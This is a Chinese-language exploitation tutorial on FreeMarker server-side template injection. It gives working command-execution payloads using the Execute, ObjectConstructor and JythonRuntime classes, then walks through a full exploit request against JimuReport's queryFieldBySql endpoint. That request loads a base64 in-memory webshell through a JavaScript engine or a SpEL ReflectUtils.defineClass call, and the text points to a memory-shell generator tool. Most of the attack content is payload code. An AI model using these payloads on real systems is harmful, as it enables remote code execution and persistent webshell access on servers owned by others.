Freemarker是一种java模板开发引擎，基于模板和程序数据动态输出文本的通用工具。在freemarker中以ftl文件作为模板文件，其结构类似于html格式，一般由以下几部分组成：

1. 文本，即文本。

2. 注释，与html注释一样。

3. 插值，使用${}包裹，用于动态地从程序中插入数据。

4. ftl标签，<#<>>

两种freemarker ssti漏洞常用的POC：

· POC1使用freemarker.template.utility.Execute类，其exec方法直接调用Runtime().getRuntime().exec()执行命令。

<#assign ex="freemarker.template.utility.Execute"?new()>${ex("whoami")}
${"freemarker.template.utility.Execute"?new()("whoami")}

· POC2使用ObjectConstructor类，其exec方法通过反射实现了将指定输入的类进行实例化，利用其exec方法可以通过java.lang.ProcessBuilder可执行命令，通过JS引擎/spel表达式可执行java代码，因此这种利用方式在注入内存马等深入利用中最为常见。

<#assign ex="freemarker.template.utility.ObjectConstructor"?new()>${ex("java.lang.ProcessBuilder","whoami").start()}

${"freemarker.template.utility.ObjectConstructor"?new()("java.lang.ProcessBuilder","calc").start()}

<#assign ob="freemarker.template.utility.ObjectConstructor"?new()><#assign br=ob("java.io.BufferedReader",ob("java.io.InputStreamReader",ob("java.lang.ProcessBuilder","whoami").start().getInputStream())) ><#list 1..1000 as t><#assign line=br.readLine()!\"null\"><#if line==\"null\"><#break>${line}${\"
\"}

//借助js引擎
<#assign ex="freemarker.template.utility.ObjectConstructor"?new()>${ex(javax.script.ScriptEngineManager").getEngineByName("js").eval("java.lang.System.getProperty(\"java.version\")")}
${"freemarker.template.utility.ObjectConstructor"?new()("javax.script.ScriptEngineManager").getEngineByName("js").eval("java.lang.System.getProperty(\"java.version\")")}

//spel表达式
${"freemarker.template.utility.ObjectConstructor"?new()("org.springframework.expression.spel.standard.SpelExpressionParser").parseExpression("{T(java.lang.System).getProperty(\"java.version\")}").getValue()}

· POC3使用Jython执行系统命令，但是需要其他依赖所以并不常用。

<#assign value="freemarker.template.utility.JythonRuntime"?new()><@value>import os;os.system("calc.exe")

EXP

以积木报表queryFieldBySql接口freemarker ssti漏洞为例，从公开的poc中可以看出其使用ObjectConstructor反射调用ScriptEngineManager以执行java代码来自定义加载类实现注入内存马。

{"sql":"call${\"freemarker.template.utility.ObjectConstructor\"?new()(\"javax.script.ScriptEngineManager\").getEngineByName(\"js\").eval(\"classLoader=java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apachen.SOAPUtils').newInstance();}catch(e){clsString=classLoader.loadClass('java.lang.String');bytecodeBase64='这里填入base64的内存马';try{clsBase64=classLoader.loadClass('java.util.Base64');clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);}catch(ee){try{datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);}catch(eee){clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);}}clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');clsByteArray=(''.getBytes().getClass());clsInt=java.lang.Integer.TYPE;defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);defineClass.setAccessible(true);clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);clazz.newInstance();};#{1};\")}","dbSource":"","type":"0"}

1.创建ObjectConstructor实例，加载ScriptEngineManager类，获取js引擎通过eval方法执行Java代码。

"freemarker.template.utility.ObjectConstructor"?new()("javax.script.ScriptEngineManager").getEngineByName("js").eval("...")

2.获取类加载器，尝试加载恶意类并实例化。

classLoader=java.lang.Thread.currentThread().getContextClassLoader();try{classLoader.loadClass('org.apachen.SOAPUtils').newInstance();}

3.当直接实例化恶意类失败时，重新加载base64之后的恶意类（根据中间件、依赖等通过JmG生成对应的内存马）。

catch(e){
    clsString=classLoader.loadClass('java.lang.String');
    bytecodeBase64='这里填入base64的内存马';
    try{
        clsBase64=classLoader.loadClass('java.util.Base64');
        clsDecoder=classLoader.loadClass('java.util.Base64$Decoder');
        decoder=clsBase64.getMethod('getDecoder').invoke(base64Clz);
        bytecode=clsDecoder.getMethod('decode',clsString).invoke(decoder,bytecodeBase64);
    }catch(ee){
        try{
            datatypeConverterClz=classLoader.loadClass('javax.xml.bind.DatatypeConverter');
            bytecode=datatypeConverterClz.getMethod('parseBase64Binary',clsString).invoke(datatypeConverterClz,bytecodeBase64);
        }catch(eee){
            clazz1=classLoader.loadClass('sun.misc.BASE64Decoder');
            bytecode=clazz1.newInstance().decodeBuffer(bytecodeBase64);
        }
    }
}
clsClassLoader=classLoader.loadClass('java.lang.ClassLoader');
clsByteArray=(''.getBytes().getClass());
clsInt=java.lang.Integer.TYPE;
defineClass=clsClassLoader.getDeclaredMethod('defineClass',[clsByteArray,clsInt,clsInt]);
defineClass.setAccessible(true);
clazz=defineClass.invoke(classLoader,bytecode,0,bytecode.length);
clazz.newInstance();

初级payload

高版本JDK不再内置js引擎或者极少数低版本jdk也不支持js引擎的情况，为应对这种情况可以尝试通过spel表达式实现注入内存马，以下为FreeMarker 模板引擎结合Spring Expression Language (SpEL) 实现获取jdk版本的payload。

${"freemarker.template.utility.ObjectConstructor"?new()("org.springframework.expression.spel.standard.SpelExpressionParser").parseExpression("{T(java.lang.System).getProperty(\"java.version\")}").getValue()}

分段来解析上述代码结构:

1.freemarker.template.utility.ObjectConstructor"?new()("org.springframework.expression.spel.standard.SpelExpressionParser").parseExpression()

o 通过freemarker内置的new方法实例化SpelExpressionParser类并调用parseExpression方法等待解析spel表达式。

2.{T(java.lang.System).getProperty(\"java.version\")}

o spel表达式，调用system类下getProperty获取jdk版本。

3.getValue():

o 执行解析后的 SpEL 表达式，并返回结果。

用到的spel表达式知识：

1.类型表达式T()

o T(全限定类名)：返回此类的类对象，可以直接调用该类的静态方法/变量。注意，此处获取的是此类的类对象而不是实力对象，因此无法调用非静态方法。如，{T(javax.script.ScriptEngineManager).getEngineByName("js")此种写法就是错误的，因为getEngineByName方法是非静态方法。

2.在spel表达式中可以使用new方法。

o {T(javax.script.ScriptEngineManager).getEngineByName("js")可以使用new javax.script.ScriptEngineManager().getEngineByName("js")来实现。

spel表达式注入内存马，前半部分与上述payload一致既创建spel表达式解析器

${"freemarker.template.utility.ObjectConstructor"?new()("org.springframework.expression.spel.standard.SpelExpressionParser").parseExpression("[spel表达式]")

spel表达式部分，通过org.springframework.cglib.core.ReflectUtils类defineClass方法动态加载恶意类以实现任意代码执行。

{T(org.springframework.cglib.core.ReflectUtils).defineClass(
\"[注入器类名]\",
T(java.util.Base64).getDecoder().decode(\"[base64编码的内存马]\"),
T(java.lang.Thread).currentThread().getContextClassLoader(),
null,
T(java.lang.Class).forName(\"org.springframework.expression.ExpressionParser\")
)}

1.java-memshell-generator生成内存马

工具地址：https://github.com/pen4uin/java-memshell-generator，注入器类名要与payload中definClass方法中要加载的类名一致。

2.修改payload，加载内存马，成功则返回如图所示。

{"sql":"select '${\"freemarker.template.utility.ObjectConstructor\"?new()(\"org.springframework.expression.spel.standard.SpelExpressionParser\").parseExpression(\"{T(org.springframework.cglib.core.ReflectUtils).defineClass(\\\"org.springframework.f.SessionDataUtilssss\\\",T(java.util.Base64).getDecoder().decode(\\\"[此处填写base64编码的内存马文件]\\\"),T(java.lang.Thread).currentThread().getContextClassLoader(), null, T(java.lang.Class).forName(\\\"org.springframework.expression.ExpressionParser\\\"))}\").getValue()}'"}

3.选择对应工具，连接内存马。